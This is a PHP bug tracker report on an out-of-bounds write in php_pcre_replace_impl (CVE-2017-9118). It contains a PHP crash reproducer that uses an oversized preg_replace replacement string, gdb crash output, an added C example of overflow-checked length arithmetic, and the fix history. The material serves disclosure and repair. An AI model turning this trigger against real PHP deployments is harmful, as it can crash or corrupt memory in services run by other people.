Bug #74604 Out of bounds in php_pcre_replace_impl
Submitted: 2017-05-17 09:12 UTC Modified: 2021-10-20 12:07 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: whitehat002 at hotmail dot com Assigned: cmb (profile)
Status: Closed Package: PCRE related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: 2017-9118

 

 [2017-05-17 09:12 UTC] whitehat002 at hotmail dot com
Description:
------------
It seems to be an out of bounds bug.

Test script:
---------------
<?php
// Lift the memory limit so the ~2 GiB replacement string can be built.
ini_set('memory_limit',-1);
// Replacement string of 0x7ffffffe bytes.
$str=str_repeat("A",0x7ffffffe);
// Every 'A' in the subject is replaced by the huge string.
preg_replace("/A/i",$str,"AAAAAAAAAAAAAAAAAA");


Expected result:
----------------
no crash 

Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php 
Reading symbols from /root/php-7.1.5/sapi/cli/php...done.
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x36dfdfb0 ('A' <repeats 200 times>...)
EBX: 0xb7200000 
ECX: 0x0 
EDX: 0x41 ('A')
ESI: 0x41 ('A')
EDI: 0xb6c0000d --> 0x0 
EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...)
ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
EIP: 0x8106c7d (<php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl)
EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8106c75 <php_pcre_replace_impl+933>:	jne    0x8106cb8 <php_pcre_replace_impl+1000>
   0x8106c77 <php_pcre_replace_impl+935>:	mov    eax,DWORD PTR [ebp-0x24]
   0x8106c7a <php_pcre_replace_impl+938>:	movzx  edx,BYTE PTR [eax]
=> 0x8106c7d <php_pcre_replace_impl+941>:	mov    BYTE PTR [ebx],dl
   0x8106c7f <php_pcre_replace_impl+943>:	lea    edx,[eax+0x1]
   0x8106c82 <php_pcre_replace_impl+946>:	add    ebx,0x1
   0x8106c85 <php_pcre_replace_impl+949>:	mov    DWORD PTR [ebp-0x24],edx
   0x8106c88 <php_pcre_replace_impl+952>:	movzx  esi,BYTE PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...)
0008| 0xbfffbe98 --> 0x0 
0012| 0xbfffbe9c --> 0x20 (' ')
0016| 0xbfffbea0 --> 0x0 
0020| 0xbfffbea4 --> 0x0 
0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0 
0028| 0xbfffbeac --> 0x3 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, 
    subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, 
    replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, 
    replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317
1317						*walkbuf++ = *walk++;
gdb-peda$ x/s $ebx
0xb7200000:	 <Address 0xb7200000 out of bounds>
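
An added example (not code from php-src or from the reporter) of the length arithmetic a replace routine must get right before it writes into its output buffer. It models the sum in 32-bit arithmetic, as on the i386 build in the gdb session above, using the replacement length 0x7ffffffe from the test script and the subject_len of 0x20 from the gdb frame. It assumes, which the report itself does not state, that the write past the buffer end is the consequence of such a length sum wrapping; the checked variant refuses a result that does not fit instead of allocating too little.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not php-src code. A search-and-replace has to size its
 * output buffer as
 *     subject_len - matches * match_len + matches * replace_len
 * before it copies bytes into it. The functions below model that sum in
 * 32-bit size_t arithmetic (the report's gdb session is an i386 build).
 * Assumption, not stated in the report: the out-of-bounds write shown
 * there is the kind of failure that follows when this sum wraps.
 */

/* Unchecked form: wraps silently when the product or sum exceeds 2^32-1. */
uint32_t replace_len_wrapping(uint32_t subject_len, uint32_t match_len,
                              uint32_t matches, uint32_t replace_len)
{
    return subject_len - matches * match_len + matches * replace_len;
}

/*
 * Checked form: computes the same quantity in 64 bits and rejects any
 * result that does not fit in 32 bits, so the caller can fail the
 * operation instead of allocating a buffer that is too small.
 * Returns true and stores the length in *out on success.
 */
bool replace_len_checked(uint32_t subject_len, uint32_t match_len,
                         uint32_t matches, uint32_t replace_len,
                         uint32_t *out)
{
    uint64_t removed = (uint64_t)matches * match_len;
    uint64_t added   = (uint64_t)matches * replace_len;

    /* The matched text cannot exceed the subject it was found in. */
    if (removed > subject_len) {
        return false;
    }
    uint64_t total = (uint64_t)subject_len - removed + added;
    if (total > UINT32_MAX) {
        return false;
    }
    *out = (uint32_t)total;
    return true;
}

int main(void)
{
    /* Constructed inputs mirroring the report: a subject of 0x20 'A's
     * (subject_len from the gdb frame), the pattern /A/ matching one byte
     * 0x20 times, and a replacement of 0x7ffffffe bytes. */
    uint32_t subject_len = 0x20, match_len = 1, matches = 0x20;
    uint32_t replace_len = 0x7ffffffe, out;

    printf("wrapping: 0x%08x\n",
           replace_len_wrapping(subject_len, match_len, matches, replace_len));
    if (!replace_len_checked(subject_len, match_len, matches, replace_len, &out)) {
        printf("checked: output length does not fit in 32 bits, refusing\n");
    }
    return 0;
}
```

With the report's numbers the unchecked sum comes out as 0xFFFFFFC0 rather than the true 0xFFFFFFFC0, and any buffer sized from a wrapped value is shorter than the copy loop at php_pcre.c:1317 expects. Doing the arithmetic in a wider type (or with overflow-checking helpers) and refusing an oversized result is the check a replace implementation wants before its allocation.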

History

 [2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
Has anyone responded to this bug?
 [2017-06-20 06:18 UTC] stas@php.net
-Type: Security +Type: Bug
 [2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID: +CVE-ID: 2017-9118
 [2018-12-08 11:20 UTC] cmb@php.net
If it's not a security issue, it shouldn't have a CVE.
 [2021-10-20 12:05 UTC] cmb@php.net
The following pull request has been associated:

Patch Name: Fix #74604: Out of bounds in php_pcre_replace_impl
On GitHub:  https://github.com/php/php-src/pull/7597
Patch:      https://github.com/php/php-src/pull/7597.patch
 [2021-10-20 12:07 UTC] cmb@php.net
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
 [2021-11-29 18:19 UTC] git@php.net
Automatic comment on behalf of cmb69
Revision: https://github.com/php/php-src/commit/712fc54e856d3d8e80a7d074a2733bc6b3a27e90
Log: Fix #74604: Out of bounds in php_pcre_replace_impl
 [2021-11-29 18:19 UTC] git@php.net
-Status: Verified +Status: Closed
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Oct 08 19:01:28 2024 UTC